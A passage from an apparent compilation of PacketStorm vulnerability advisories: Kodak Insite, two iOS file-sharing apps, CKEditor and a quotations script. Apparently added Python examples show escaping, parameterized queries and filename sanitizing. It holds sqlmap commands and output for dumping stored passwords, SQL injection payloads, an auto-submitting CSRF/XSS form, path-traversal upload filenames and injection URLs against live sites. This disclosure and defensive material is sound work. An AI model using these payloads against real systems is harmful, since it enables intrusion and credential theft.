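    return '<a href="' + href + '">' + html.escape(table, quote=True) + '</a>'

class StartTags(HTMLParser):
    """Records (tag, [attribute names]) for every start tag the parser sees."""
    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.append((tag, [name for name, _ in attrs]))

def parse_start_tags(markup):
    p = StartTags()
    p.feed(markup)
    p.close()
    return p.seen

def event_handlers(markup):
    """Attribute names beginning with 'on' anywhere in the markup."""
    return [n for _, names in parse_start_tags(markup) for n in names if n.startswith("on")]

def count_tags(markup, wanted):
    """How many start tags named `wanted` the browser-side parser would see."""
    return sum(1 for tag, _ in parse_start_tags(markup) if tag == wanted)
```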
  9. Kodak's Insite Creative Workflow System suffers from a remote SQL injection vulnerability.

     Hello ...

     While investigating a recent installation of Kodak's Insite Creative Workflow System (for my current employer), an SQL Injection vulnerability was discovered in its "Forgot Your Password?" page.

     An example of this application can be seen on the Kodak site.

     https://creativeworkflow.kodak.com/TwAmWeb/login.asp

     Many other copies of Kodak Insite can be located with any search engine by looking for the string "insite creative login".

     Our installation was set up on an internal site, and as such, SQLMAP was applied to our local copy, as follows.

         sqlmap.py -u 'http://localhost/TwAmWeb/EmailPassword.asp' --data='user_name=1&Language=en' -p user_name --risk=3 --level=5 -o

         sqlmap identified the following injection points with a total of 163 HTTP(s) requests:
         ---
         Place: POST
         Parameter: user_name
             Type: error-based
             Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
             Payload: user_name=1') AND 5065=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(118)||CHR(110)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (5065=5065) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(116)||CHR(121)||CHR(112)||CHR(58)||CHR(62))) FROM DUAL) AND ('yCTb'='yCTb&Language=en

             Type: AND/OR time-based blind
             Title: Oracle OR time-based blind
             Payload: user_name=-2979') OR 1635=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(80)||CHR(114)||CHR(122),5) AND ('NjHU'='NjHU&Language=en
         ---
         [11:52:56] [INFO] the back-end DBMS is Oracle
         web server operating system: Windows 2003
         web application technology: ASP.NET, Microsoft IIS 6.0, ASP
         back-end DBMS: Oracle
         [11:52:56] [WARNING] HTTP error codes detected during testing:
         500 (Internal Server Error) - 44 times

     A little fishing around and it becomes obvious that all usernames/passwords can be downloaded like this:

         sqlmap.py -u 'http://localhost/TwAmWeb/EmailPassword.asp' --data='user_name=1&Language=en' --risk=3 --level=5 -o -D PRINERGY -T DBCS_REMOTEUSER --columns --dump

     Supposedly Kodak will be releasing a fix in September.

     ...

     Robert

     Source: PacketStorm
  10. MyFi Wireless Disk version 1.2 suffers from cross site request forgery, local file inclusion, and remote command injection vulnerabilities. Title: ====== MyFi Wireless Disk 1.2 iPad iPhone - Multiple Vulnerabilities Date: ===== 2013-02-13 References: =========== http://www.vulnerability-lab.com/get_content.php?id=864 VL-ID: ===== 864 Common Vulnerability Scoring System: ==================================== 8.3 Introduction: ============= MyFi Wireless-Disk turns your iPhone into a mobile wireless disk - Access your files from any web browser. mobile or desktop. Internet Explorer, Safari, Chrome, Firefox - they are all supported. - Share access to your files with friends. All they need to do is write your iDevice address as it shows in MyFi Wireless-Disk in their browser - Upload new files to your Wireless-Disk from any web browser. - Integration with iTunes file sharing. - Web preview panel to see exactly how others will see your files when opened in browser. - File manager, where you can view and manage your files, no network is required. - Usage graphs for upload and download, storage and users. - Supports landscape and portrait orientation. - Supports iPods, iPhones and iPad. - Supports many file formats in preview, movies, audio, documents and presentations. - Supports multi user access. - No limitation on file size. - No limitation on number of files. (Copy of the Homepage: https://itunes.apple.com/us/app/wireless-disk-free/id558304402) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the mobile MyFi Wireless Disk v1.2 app for the apple ipad & iphone. 
Report-Timeline: ================ 2013-02-13: Public Disclosure Status: ======== Published Affected Products: ================== Apple AppStore Product: MyFi Wireless Disk 1.2 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== 1.1 A local file include web vulnerability via POST request method is detected in the mobile MyFi Wireless Disk v1.2 app for the apple ipad & iphone. The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files. The vulnerbility is located in the upload file module of the webserver (http://192.168.0.10:80) when processing to upload a file with manipulated `filename` parameter. The execution of the injected path or file request will occur when the attacker is processing to reload to index listing of the affected module. Exploitation of the web vulnerability does not require a privileged application user account (standard) or user interaction. Successful exploitation of the vulnerability results in unauthorized path or file access via local file or path include attack. Vulnerable Application(s): [+] MyFi Wireless Disk v1.2 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Upload File Vulnerable Parameter(s): [+] filename Affected Module(s): [+] File Dir - Index Listing 1.2 A local command injection web vulnerability is detected in the mobile MyFi Wireless Disk v1.2 app for the apple ipad & iphone. The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile application. The vulnerbility is located in the index module when processing to load the ipad or iphone device name. Local attackers can change the ipad or iphone device name to system specific commands and file/path requests to provoke the execution when processing to watch the index listing. 
Exploitation of the web vulnerability requires a local privileged device user account (standard) without user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands or file/path requests.

Vulnerable Application(s):
[+] MyFi Wireless Disk v1.2 - iTunes or AppStore (Apple)

Vulnerable Module(s):
[+] Index

Vulnerable Parameter(s):
[+] device name - iPad or iPhone

Affected Module(s):
[+] Application Header - Index Listing

1.3
A cross site request forgery web vulnerability is detected in the mobile MyFi Wireless Disk v1.2 app for the Apple iPad & iPhone. The vulnerability allows remote attackers to form manipulated links or scripts that execute application functions when client side requests are loaded in the web browser.

The vulnerability is located in the application delete module and the insecurely parsed file parameter. Remote attackers can force application users with a non-expired session to execute application functions when they click a manipulated link. Exploitation of the vulnerability requires medium or high user interaction without a privileged application user account. Successful exploitation of the vulnerability results in account theft via client side session hijacking, client side phishing, or client-side content request manipulation.

Vulnerable Application(s):
[+] MyFi Wireless Disk v1.2 - iTunes or AppStore (Apple)

Vulnerable Module(s):
[+] Delete

Vulnerable Parameter(s):
[+] file

Affected Module(s):
[+] File Dir - Listing

Proof of Concept:
=================
1.1
The local file/path include web vulnerability can be exploited by remote attackers without a required application user account (no password: standard) and also without user interaction. For demonstration or reproduce ...
Local Path Include Vulnerability PoC:

POSTDATA =-----------------------------249872938427813
Content-Disposition: form-data; name="file"; filename="[INJECTED FILE OR PATH REQUEST]<.png"
Content-Type: image/png
---
ÿØÿà

Reference(s):
http://192.168.0.10/upload

1.2
The command injection web vulnerability can be exploited by local attackers with a required device application user account and with low user interaction. For demonstration or reproduce ...

Command Injection via Devicename PoC:

<body>
<a href="http://192.168.0.10/" title="Click here to refresh">
<div id="header">Files on: IPad360 ¥337>"<[COMMAND INJECTION VIA DEVICENAME].xht"></div>
</a>
<div id="wrapper">
<div id="scroller">
<ul id="thelist">
</ul>
</div>
</div>

Reference(s):
http://192.168.0.10/

1.3
The client side cross site request forgery web vulnerability can be exploited by remote attackers without an application user account and with medium or high required user interaction. For demonstration or reproduce ...

<html>
<head><body>
<title>POC CSRF - Delete Files Exploit</title>
<Referer=http://192.168.0.10/%3Cdelete%3E?file=x.png>
<Referer=http://192.168.0.10/%3Cdelete%3E?file=x.jpg>
<Referer=http://192.168.0.10/%3Cdelete%3E?file=x.gif>
<Referer=http://192.168.0.10/%3Cdelete%3E?file=x.pdf>
<Referer=http://192.168.0.10/%3Cdelete%3E?file=x.txt>
<Referer=http://192.168.0.10/%3Cdelete%3E?file=x.doc>
<Referer=http://192.168.0.10/%3Cdelete%3E?file=x.php>
</body></head>
</html>

Reference(s):
http://192.168.0.10/%3Cdelete%3E
http://192.168.0.10/%3Cdelete%3E?file=

Risk:
=====
1.1
The security risk of the file include web vulnerability is estimated as critical because of no standard password protection.

1.2
The security risk of the local command injection vulnerability via device name is estimated as high(-).

1.3
The security risk of the client side cross site request forgery web vulnerability is estimated as low(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers.
To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory

---

On 19.02.2013 03:29, Packet Storm wrote:
> There's no content.
>
> On Mon, Feb 18, 2013 at 09:36:51PM +0100, Vulnerability Lab wrote:
>> Title:
>> ======
>> MyFi Wireless Disk 1.2 iPad iPhone - Multiple Vulnerabilities
>>
>> Date:
>> =====
>> 2013-02-13
>>
>> References:
>> ===========
>> http://www.vulnerability-lab.com/get_content.php?id=864
>>
>> VL-ID:
>> =====
>> 864
>>
>> Status:
>> ========
>> Published
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com

Source: PacketStorm
  11. CKEditor version 4.0.1 suffers from cross site request forgery, cross site scripting, and path disclosure vulnerabilities.

===========================================
Vulnerable Software: ckeditor 4.0.1 standard
Download: http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip
Vulns: Full Path Disclosure && XSS
===========================================
Tested On:
Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
    with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===========================================
Vulnerable Code: /ckeditor/samples/assets/posteddata.php
=============SNIP BEGINS====================
root@debian:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets# cat posteddata.php
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
?>
<html>
<head>
	<meta charset="utf-8">
	<title>Sample — CKEditor</title>
	<link rel="stylesheet" href="sample.css">
</head>
<body>
	<h1 class="samples">
		CKEditor — Posted Data
	</h1>
	<table border="1" cellspacing="0" id="outputSample">
		<colgroup><col width="120"></colgroup>
		<thead>
			<tr>
				<th>Field Name</th>
				<th>Value</th>
			</tr>
		</thead>
<?php

if ( isset( $_POST ) )
	$postArray = &$_POST ;			// 4.1.0 or later, use $_POST
else
	$postArray = &$HTTP_POST_VARS ;	// prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value )
{
	if ( get_magic_quotes_gpc() )
		$postedValue = htmlspecialchars( stripslashes( $value ) ) ;
	else
		$postedValue = htmlspecialchars( $value ) ;

?>
		<tr>
			<th style="vertical-align: top"><?php echo $sForm?></th>
			<td><pre class="samples"><?php echo $postedValue?></pre></td>
		</tr>
<?php
}
?>
	</table>
	<div id="footer">
		<hr>
		<p>
			CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
		</p>
		<p id="copy">
			Copyright © 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
		</p>
	</div>
</body>
</html>
=============SNIP ENDS HERE====================

FULL Path Disclosure example:

URL: http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php
METHOD: $_POST

HEADERS:
Host: hacker1.own
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

$_POST DATA TO SEND:
bangbangbang[]=PATH DISCLOSURE

Result:
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets/posteddata.php on line 38

Print screen: http://i076.radikal.ru/1302/84/edbe3f8f4524.png

=================================================
CSRF+XSS

<body onload="javascript:document.forms[0].submit()">
<form name="form1" method="post" action="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php" enctype="multipart/form-data">
<input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF"></li>
</form>

=================================================
Print Screen: http://i062.radikal.ru/1302/e6/25ef023dd589.png
=================================================

And here is the fixed version: /ckeditor/samples/assets/posteddata.php

================SNIP BEGINS=======================
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
?>
<html>
<head>
	<meta charset="utf-8">
	<title>Sample — CKEditor</title>
	<link rel="stylesheet" href="sample.css">
</head>
<body>
	<h1 class="samples">
		CKEditor — Posted Data
	</h1>
	<table border="1" cellspacing="0" id="outputSample">
		<colgroup><col width="120"></colgroup>
		<thead>
			<tr>
				<th>Field Name</th>
				<th>Value</th>
			</tr>
		</thead>
<?php

if ( isset( $_POST ) )
	$postArray = &$_POST ;			// 4.1.0 or later, use $_POST
else
	$postArray = &$HTTP_POST_VARS ;	// prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value )
{
	if ( get_magic_quotes_gpc() )
		$postedValue = htmlspecialchars( stripslashes( (string) $value ) ) ;
	else
		$postedValue = htmlspecialchars( (string) $value ) ;

?>
		<tr>
			<th style="vertical-align: top"><?php echo htmlspecialchars( (string) $sForm ); ?></th>
			<td><pre class="samples"><?php echo $postedValue?></pre></td>
		</tr>
<?php
}
?>
	</table>
	<div id="footer">
		<hr>
		<p>
			CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
		</p>
		<p id="copy">
			Copyright © 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
		</p>
	</div>
</body>
</html>
=============ENJOYYY====================

KUDOSSSSSSS
=========================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3* To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
===========================================
/AkaStep

Source: PacketStorm
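The two defects in posteddata.php come down to one output-escaping rule applied inconsistently: the field name ($sForm) is echoed raw, and a `foo[]=` field arrives as an array that htmlspecialchars() refuses, and the resulting PHP warning prints the script's absolute path. The following is an added Python rendition of that page's loop (not CKEditor's code and not AkaStep's fix) with a legacy renderer that reproduces both defects beside a corrected one; the request bodies, function names and output markup are constructed for illustration:

```python
import html
from urllib.parse import parse_qs

# Constructed sample request bodies (application/x-www-form-urlencoded), not captured traffic.
SAMPLE_PLAIN = "name=Alice&bio=<b>hi</b>"
SAMPLE_ARRAY = "bangbangbang[]=one&bangbangbang[]=two"      # PHP turns foo[]=... into an array
SAMPLE_KEY_XSS = "<script>alert(1)</script>=SENDF"          # payload in the field NAME, not the value


def render_rows_legacy(body):
    """Mirrors the original posteddata.php: key echoed unescaped, value handed
    straight to the escaper even when it is a list."""
    fields = parse_qs(body, keep_blank_values=True)
    rows = []
    for name, values in fields.items():
        value = values[0] if len(values) == 1 else values     # list survives for foo[] fields
        rows.append(f"<tr><th>{name}</th><td><pre>{html.escape(value)}</pre></td></tr>")
    return rows


def probe_legacy(body):
    """Return the exception class name the legacy renderer raises, or None.
    With PHP the equivalent failure printed a Warning containing the full path."""
    try:
        render_rows_legacy(body)
    except Exception as exc:
        return type(exc).__name__
    return None


def coerce_to_str(value):
    """Flatten list-valued fields so the escaper only ever sees a string."""
    if isinstance(value, (list, tuple)):
        return ", ".join(coerce_to_str(v) for v in value)
    return str(value)


def render_rows(body):
    """Corrected loop: both the field name and the value are escaped, arrays are coerced."""
    fields = parse_qs(body, keep_blank_values=True)
    rows = []
    for name, values in fields.items():
        safe_name = html.escape(name, quote=True)
        safe_value = html.escape(coerce_to_str(values), quote=True)
        rows.append(f"<tr><th>{safe_name}</th><td><pre>{safe_value}</pre></td></tr>")
    return rows


def render_page(body):
    """Wrap rendering so an unexpected failure never echoes exception text
    (the PHP warning is what disclosed /etc/apache2/htdocs/.../posteddata.php)."""
    try:
        rows = render_rows(body)
    except Exception:
        return "<p>Could not render posted data.</p>"
    return "<table>" + "".join(rows) + "</table>"


if __name__ == "__main__":
    print(probe_legacy(SAMPLE_ARRAY))          # legacy renderer blows up on the array field
    print("".join(render_rows_legacy(SAMPLE_KEY_XSS)))   # raw <script> lands in the <th>
    print(render_page(SAMPLE_KEY_XSS))         # corrected: name is escaped too
```

The generic error page in render_page is the part people forget: even with the type problem fixed, any future uncaught error on a page like this should be logged server-side and answered with a neutral message, never with the interpreter's own diagnostic.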
  12. RTTucson Quotations Database Script suffers from remote SQL injection and cross site scripting vulnerabilities.

##################################################################################
RTTucson Quotations Database Script, Multiple Vulnerabilities

Software Page: http://www.rttucson.com/index.html
Script Demo: http://www.rttucson.com/quotations/default.php
Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhatz Inc. and Janissaries Platform.
##################################################################################

[~] MySQL Injection on Demo Site
[+] (author.php, ID Param) >>> http://www.rttucson.com/quotations/author.php?ID=5' (MySQLi Found)
[+] (category_quotes.php, ID Param) >>> http://www.rttucson.com/quotations/category_quotes.php?ID=9' (MySQLi Found)

[~] XSS on Demo Site
>> (quote_search.php, keywords Param) >>> http://www.rttucson.com/quotations/quote_search.php?keywords=<h1>Xssed-3spi0n</h1>

Source: PacketStorm
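"MySQLi Found" after appending a single quote to ID means the script builds its query by string concatenation, so the quote reaches the parser and produces a database error. Added example, not the RTTucson script's code: a string-built lookup beside a validated, parameterized one, using an in-memory sqlite3 table as a stand-in for the MySQL backend. The table, its rows and the function names are assumptions made for this illustration:

```python
import sqlite3


def make_db():
    """Constructed stand-in for the quotations database (two authors, not real site data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE authors (ID INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO authors VALUES (?, ?)",
                     [(5, "Mark Twain"), (9, "Oscar Wilde")])
    return conn


def author_vulnerable(conn, raw_id):
    """Shape of author.php?ID=...: the parameter is glued into the SQL text.
    A trailing quote leaves the string literal unterminated and the engine errors out,
    which is exactly the symptom the advisory reports."""
    return conn.execute("SELECT name FROM authors WHERE ID = '" + raw_id + "'").fetchall()


def author_fixed(conn, raw_id):
    """Two independent layers: the value must look like an integer ID at all,
    and whatever survives is bound as a parameter, never spliced into SQL text."""
    if not raw_id.isdigit():
        return []
    return conn.execute("SELECT name FROM authors WHERE ID = ?", (int(raw_id),)).fetchall()


def probe(conn, raw_id):
    """Return (error_from_vulnerable_query, rows_from_fixed_query) for one input,
    so the two behaviours can be compared side by side."""
    try:
        author_vulnerable(conn, raw_id)
        vuln_err = None
    except sqlite3.OperationalError as exc:
        vuln_err = str(exc)
    return vuln_err, author_fixed(conn, raw_id)


if __name__ == "__main__":
    db = make_db()
    for probe_id in ("5", "5'", "9"):
        print(repr(probe_id), probe(db, probe_id))
```

The error string returned by probe() is what an application should keep in its own logs; the HTTP response should carry only a generic message, since the verbose database error is what makes the "MySQLi Found" check work in the first place.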
  13. Description: “No Tools? No Problem! Building a PowerShell Botnet” - Christopher “@obscuresec” Campbell

Source: ShmooCon Firetalks 2013 (Hacking Illustrated Series InfoSec Tutorial Videos)

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Shmoocon 2013 - No Tools? No Problem! Building A Powershell Botnet Christopher
  14. Description: “Managed Service Providers: Pwn One and Done” - Damian “@integrisec” Profancik

Source: ShmooCon Firetalks 2013 (Hacking Illustrated Series InfoSec Tutorial Videos)

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Shmoocon 2013 - Managed Service Providers: Pwn One And Done” Damian
  15. Description: “Drones: Augmenting your cyber attack tool bag with aerial weapon systems” by Zac “@ph3n0” Hinkel

Source: ShmooCon Firetalks 2013 (Hacking Illustrated Series InfoSec Tutorial Videos)

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Shmoocon 2013 - Drones: Augmenting Your Cyber Attack Tool Bag With Aerial Weapon Systems
  16. USB Sharp version 1.3.4 suffers from local file inclusion and persistent cross site scripting vulnerabilities.

Title:
======
USB Sharp v1.3.4 iPad iPhone - Multiple Web Vulnerabilities

Date:
=====
2013-02-16

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=873

VL-ID:
=====
873

Common Vulnerability Scoring System:
====================================
6.3

Introduction:
=============
USB Sharp Pro can turn your iPhone, iPad, iPod into a large capacity, portable and wireless storage disk, facilitating efficient management of your files!

Support for editing php, js, html files.
Support for open formats such as flv, asf, rmvb, avi, mpg, mkv, wmv.
Dropbox operate, multiple files upload & download, history, create folder
Add manual
Chrome and Firefox supported
Upload multiple files
Extract files from encrypted .rar
Optimized pdf reader
Support for importing videos/photos to Photo Library
Support for exporting video from Photo Library
Search file (folder) name function added
Picture Viewer improved
Unzip type added
Add authentication for local login
Add authentication for wifi transfer
Custom background image;
...
...
...
Full screen view of files supported
Multiple photo import supported
Sorting by file name, create time and file type
View, copy, move, delete, rename, email, zip
Compression and unzip of files/folders
Encryption folder, protect your files
Extract all files from a compressed .zip file
Glide deleting function
Select all and Cancel all operate
Transferring files by wifi and iTunes file sharing
Email multiple files, folder supported
Open email attachments
Photo import supported
Open files in other applications
Landscape mode supported
iPad-compatible

Plain text: .txt .php .js .html
Document: .pdf .csv .rtf .rtfd .doc .docx .xls .xlsx .ppt .pptx (office 2003 or later)
Image: .png .jpg .jpeg .gif .bmp .xbm .tif .tiff
Audio: .mp3 .m4a .aac
Video: .mp4 .mov .m4v .3gp .flv .asf .rmvb .avi .mpg .mkv .wmv
Web: .htm .html .xhtml
Compressed: .zip .rar

Cost: 2,99$ - iPad or iPhone (iTunes or Appstore)

(Copy of the Homepage: https://itunes.apple.com/us/app/usb-sharp-pro/id436590784 )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the mobile USB Sharp v1.3.4 app for the Apple iPad & iPhone.

Report-Timeline:
================
2013-02-16: Public Disclosure

Status:
========
Published

Affected Products:
==================
Apple AppStore
Product: USB Sharp - Web Server Application 1.3.4

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
1.1
A local file include web vulnerability via POST request method is detected in the mobile USB Sharp v1.3.4 app for the Apple iPad & iPhone. The vulnerability allows remote attackers, via the POST method, to inject local app webserver folders in order to request unauthorized local webserver files.

The vulnerability is located in the upload file module of the webserver (http://192.168.0.10/) when processing a manipulated filename loaded via POST. The execution of the injected path or file request occurs when the attacker views the file dir listing.
Exploitation of the vulnerability requires no user interaction and can be done without a privileged application user account (no password standard). Successful exploitation of the vulnerability results in unauthorized path or file access via a local file or path include attack.

Vulnerable Application(s):
[+] USB Sharp v1.3.4 - iTunes or AppStore (Apple)

Vulnerable Module(s):
[+] File Upload (Web Server) [Remote]

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Filename Dir Index Listing

1.2
A persistent input validation vulnerability is detected in the mobile USB Sharp v1.3.4 app for the Apple iPad & iPhone. The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the app web service.

The vulnerability is located in the index file dir listing module of the webserver (http://192.168.0.10:41491/) when processing manipulated new chxItem parameters injected via the POST method. The persistent script code is executed out of the main index file dir listing module when the service lists the new foldername as an item. Exploitation of the vulnerability requires low or medium user interaction without a privileged application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account theft via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation.

Vulnerable Application(s):
[+] USB Sharp v1.3.4 - iTunes or AppStore (Apple)

Vulnerable Module(s):
[+] Index File Dir Listing

Vulnerable Parameter(s):
[+] Foldername (items > chxItem)

Affected Module(s):
[+] Index Listing

Proof of Concept:
=================
1.1
The local file include web vulnerability can be exploited by remote attackers without user interaction and without a privileged application user account. For demonstration or reproduce ...
Example:
File > Upload via POST > Tamper Session > Change Filename Value to File or Path + Extension > Open Listing > Execution

PoC: (POST)

-----------------------------1337341202721337
Content-Disposition: form-data; name="file"; filename="..%2F..%2F..%2F..%2Fcmd>home>tmp%00<'.JPG"
Content-Type: image/jpg

Note: Encode the request to bypass the encoding validation of the input. (%2F)

Reference(s):
http://192.168.0.10:41491/

1.2
The persistent input validation vulnerability can be exploited by remote attackers without user interaction and without a privileged application user account. For demonstration or reproduce ...

PoC: Index - Folder Dir Listing

<tbody id="filelist"><tr><td><input name="chxItem" value="[PERSISTENT INJECTED SCRIPT CODE!]" onclick="selChkItem(this)" type="checkbox"></td><td><a href="/[PERSISTENT INJECTED SCRIPT CODE!]%3C?guid=
47E79C76-D4C2-4086-B695-3CEE71A6B5F3&type=child" class="file"><span style="vertical-align:middle;"><img src="/Folder.png" style="border:0;vertical-align:middle" ;=""></span>%20"><[PERSISTENT INJECTED SCRIPT CODE!];)" <<="" a=""></td><td></td>
<td>2013-02-10 22:57:54</td><td><input name="commit" type="button" value="Delete" onclick="DelegateData('/[PERSISTENT INJECTED SCRIPT CODE!]','47E79C76-D4C2-4086-B695-3CEE71A6B5F3');" class='button' /></form></td></tr></tbody></table></iframe></a></td></tr><tr><td colspan="5"><span class="total">1 items</span> </td></tr></tbody>

Reference(s):
http://192.168.0.10:41491/

Risk:
=====
1.1
The security risk of the local file/path include web vulnerability via POST request method is estimated as high(+).

1.2
The security risk of the persistent input validation web vulnerability is estimated as medium.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty.
Copyright © 2013 | Vulnerability Laboratory

--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com

Source: PacketStorm
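Both app advisories in this thread (MyFi 1.1 and USB Sharp 1.1) come down to the same server-side omission: the multipart `filename` is trusted as a path component, and in the USB Sharp case the validation ran on the still-encoded string, so `..%2F` and `%00` slipped past it. Their second findings (device name and folder name rendered raw into the HTML listing) share one fix as well: escape at output time. The block below is an added example of the defensive side, not code from either app or from Vulnerability-Lab; the sample filenames are constructed to have the same shape as the PoCs, and the allowlist, upload directory and function names are assumptions:

```python
import html
import os
import unicodedata
from urllib.parse import unquote

# Constructed inputs modelled on the PoC shapes above (not captured traffic),
# mapped to the name the sanitizer is expected to return (None = reject).
SAMPLES = {
    "photo.png": "photo.png",
    "report final.pdf": "report_final.pdf",
    "..%2F..%2F..%2F..%2Fcmd>home>tmp%00<'.JPG": None,   # USB Sharp 1.1: encoded traversal + NUL
    "[INJECTED FILE OR PATH REQUEST]<.png": None,        # MyFi 1.1: markup/path in the filename
    "../../etc/passwd": None,                            # plain traversal, no allowed extension
    "%252e%252e%252fsecret.txt": "secret.txt",           # double-encoded: decoded, then reduced to basename
    ".htaccess": None,                                   # dot files are never accepted
}

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".txt"}   # assumed policy
SAFE_CHARS = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-")


def fully_decode(raw, rounds=3):
    """Percent-decode until the string stops changing (bounded). Validating
    before decoding is what let '..%2F' through in the advisory."""
    for _ in range(rounds):
        decoded = unquote(raw)
        if decoded == raw:
            return raw
        raw = decoded
    return raw


def safe_upload_name(raw):
    """Return a storage-safe basename, or None when the upload must be rejected."""
    name = fully_decode(raw)
    if "\x00" in name:                                   # NUL truncation: reject outright
        return None
    name = unicodedata.normalize("NFKC", name)
    base = name.replace("\\", "/").rsplit("/", 1)[-1]    # keep only the last path component
    base = "_".join(base.split())                        # collapse whitespace
    if base in ("", ".", "..") or base.startswith("."):
        return None
    if any(ch not in SAFE_CHARS for ch in base):         # allowlist, not a blocklist of < > ' etc.
        return None
    if os.path.splitext(base)[1].lower() not in ALLOWED_EXT:
        return None
    return base


def resolve_upload_path(upload_dir, raw):
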